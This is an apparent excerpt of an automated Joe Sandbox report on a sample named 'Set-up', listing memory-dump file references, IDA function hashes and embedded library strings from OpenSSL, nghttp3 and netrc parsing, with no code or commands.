                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$@$@$ssl/quic/quic_txp.c
                                    • API String ID: 0-600063881
                                    • Opcode ID: 000e32a861a9f1853819be492e46ba6b87be28786b5e091e9ead0183204b8d53
                                    • Instruction ID: 8e6150563ef534bc0e19cae8870dc95ffbff3fa9540da00b647b575faa49c625
                                    • Opcode Fuzzy Hash: 000e32a861a9f1853819be492e46ba6b87be28786b5e091e9ead0183204b8d53
                                    • Instruction Fuzzy Hash: 9353E8716083818FD724EF29C884BABB7E5FF85314F18492DE89987391D771E944CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: default$login$macdef$machine$netrc.c$password
                                    • API String ID: 0-1043775505
                                    • Opcode ID: d7ac81e54bbf878c4c4695e7679fe9427dd0138f95a9778b62b52206b8da8512
                                    • Instruction ID: f1dc5ba37134f419441bff201a829015350fbdd35543259e97a72398a2bf3218
                                    • Opcode Fuzzy Hash: d7ac81e54bbf878c4c4695e7679fe9427dd0138f95a9778b62b52206b8da8512
                                    • Instruction Fuzzy Hash: 20E136705283C19BE7119F23D885B2BBBD4AFA5788F14042CF8D557282E3B5DE48D792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: BQ`
                                    • API String ID: 0-1649249777
                                    • Opcode ID: 10e448924b5966f69b5ed819cca95ec5eda3f69c59e225fdedd8391064a66ace
                                    • Instruction ID: f57caac87f1e9e069c2c39f5ffe42bad6fefae3c1d6d704080d0a45284d83851
                                    • Opcode Fuzzy Hash: 10e448924b5966f69b5ed819cca95ec5eda3f69c59e225fdedd8391064a66ace
                                    • Instruction Fuzzy Hash: 80A2B171A08B169FC718CF29C490669F7E2FF88314F19866ED8A987781D334F861DB91
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00E72212,00000000,00000000), ref: 00DF0109
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$strcpy
                                    • String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
                                    • API String ID: 2790333442-843477118
                                    • Opcode ID: 7e6b7ef33a4c9682bda4c8d8b9536d826cd50d941d7d9df3f817e9da5296ce9e
                                    • Instruction ID: 225f70d8c7837950a45f6a90e5815cc4c3089c0f294a935eb5f281799f29ae04
                                    • Opcode Fuzzy Hash: 7e6b7ef33a4c9682bda4c8d8b9536d826cd50d941d7d9df3f817e9da5296ce9e
                                    • Instruction Fuzzy Hash: 50E13C719083099BD7219F28D84173EBBD1AF91754F0ACB2DFAC8A7253E371D94487A2
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,00D2C1CE,?,00000003,?), ref: 00D2E4EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
                                    • API String ID: 1222420520-1997541155
                                    • Opcode ID: adda330264f46620689e4a10c2c0215c5af94790c4b17fea5a4ce70da31da721
                                    • Instruction ID: bbff29b8045ea85496f8b1f275ac08b444c34b93cfefc5fa0fd43c5445b3e056
                                    • Opcode Fuzzy Hash: adda330264f46620689e4a10c2c0215c5af94790c4b17fea5a4ce70da31da721
                                    • Instruction Fuzzy Hash: 80E10732B042205BD7199E2CE880729B7D7EFE5314F298A3CE9A9C73C1D635DC4987A1
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 00EEE5F2
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00EEE67F
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00EF003E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: d560192192d425f2fe1a2247082bb7b072702ed6445928f4ee7439397c72066a
                                    • Instruction ID: 997138a687871677968ddc65f790c020d5791ec63757fc5697fa468773d61b91
                                    • Opcode Fuzzy Hash: d560192192d425f2fe1a2247082bb7b072702ed6445928f4ee7439397c72066a
                                    • Instruction Fuzzy Hash: 27D24DAAC39BD541E323A63D64122E6E750AFFB248F51E72BFCD430E52EB2175844319
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4$`$`
                                    • API String ID: 0-1230936812
                                    • Opcode ID: 22c08b1c20045edf401854e8e41b5133f4c57ccf1e5271b70e173b36f1baf315
                                    • Instruction ID: 3cf28acf13b2205a4eec4758e929f10735dc79cd28ceff9063bf192128b00e70
                                    • Opcode Fuzzy Hash: 22c08b1c20045edf401854e8e41b5133f4c57ccf1e5271b70e173b36f1baf315
                                    • Instruction Fuzzy Hash: 42B2B072D087958FD724CF18C8806AAB7E2FFCA314F158B2DE99597366D730A905CB42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $ $
                                    • API String ID: 0-3665324030
                                    • Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                                    • Instruction ID: 2dd4d20f9ad501ed2ad1effb85b2b3411a13c3c1a6cd8603d3e92664b4468f4b
                                    • Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                                    • Instruction Fuzzy Hash: 426204759083958FC324CF29C48066AFBE1BFC8350F148A2EEAD993361D774A945DF92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
                                    • API String ID: 0-2745174052
                                    • Opcode ID: c237eb257d72bb539e8805883338f347921f3899f2df169c6d702f05bfc348d4
                                    • Instruction ID: b776c0e7a373f278bc7c01e0afe781343f178b276df9661788d9f0ee41afb8dd
                                    • Opcode Fuzzy Hash: c237eb257d72bb539e8805883338f347921f3899f2df169c6d702f05bfc348d4
                                    • Instruction Fuzzy Hash: 7FD10875A483459BE7309B5ADC42B7BB7E5BF85704F08082CF98967282E771E904CB72
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 85ea9e0452e0729a0b042d439064abb5a501438ef734181bd65ed0bed78b28ca
                                    • Instruction ID: 746350bbdd28f6b5f5373d96ce2c66e6c83b7bc28a5542d7675aa9c627c70063
                                    • Opcode Fuzzy Hash: 85ea9e0452e0729a0b042d439064abb5a501438ef734181bd65ed0bed78b28ca
                                    • Instruction Fuzzy Hash: B7828D72A087598FC724CF28C88066AF7E1BFC4714F198A2DE99997361D770E845DF82
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00EEE16E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: providers/implementations/kdfs/argon2.c
                                    • API String ID: 3510742995-3406374482
                                    • Opcode ID: aa9e56cc6e21382a672e0a6432a6b8ca0867922a5f789221647865a595aeb891
                                    • Instruction ID: 43b39858ae7edbe5442829f95a74447c0fddf5805c33e2accf38b43024542730
                                    • Opcode Fuzzy Hash: aa9e56cc6e21382a672e0a6432a6b8ca0867922a5f789221647865a595aeb891
                                    • Instruction Fuzzy Hash: C9515771D087049BD310EB28D84169AF3E8FF98344F549E2DE98AA7242E331FAC5C785
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: b98a3b23921078d086398a01b1c7b0029fe2ba029414c6c65b29767501d6dfb7
                                    • Instruction ID: be15df5bf3d6c9e371d744feac73e24fd7529cba86f29fdeb5ec84380d03a3b1
                                    • Opcode Fuzzy Hash: b98a3b23921078d086398a01b1c7b0029fe2ba029414c6c65b29767501d6dfb7
                                    • Instruction Fuzzy Hash: 0FE27931A083658BD719CF69D08056EFBE2AFC8304F198A2DE9D997395D770EC45CB82
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,00FD22FC,?,?), ref: 00FD447B
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 00FD4760
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
